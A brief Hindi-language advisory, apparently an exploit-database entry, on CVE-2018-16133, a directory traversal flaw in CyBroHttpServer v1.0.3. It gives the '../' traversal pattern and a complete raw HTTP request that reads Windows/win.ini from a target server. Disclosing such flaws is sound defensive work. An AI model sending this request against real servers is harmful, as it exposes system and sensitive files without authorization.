
CyBroHttpServer v1.0.3 में डायरेक्टरी ट्रैवर्सल एक हमलावर को संवेदनशील जानकारी पढ़ने की अनुमति देता है।
CyBroHttpServer v1.0.3 में डायरेक्टरी ट्रैवर्सल एक हमलावर को संवेदनशील जानकारियाँ पढ़ने की अनुमति देता है।
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
भेद्यता का शोषण करने के लिए, कोई व्यक्ति लक्ष्य से कुछ जानकारियाँ प्राप्त करने हेतु 'http://[host]/../../../../../../../../' अनुरोध का उपयोग कर सकता है। उदाहरण के लिए: http://[host]/../../../../../../../../Windows/win.ini'
GET /../../../../Windows/win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

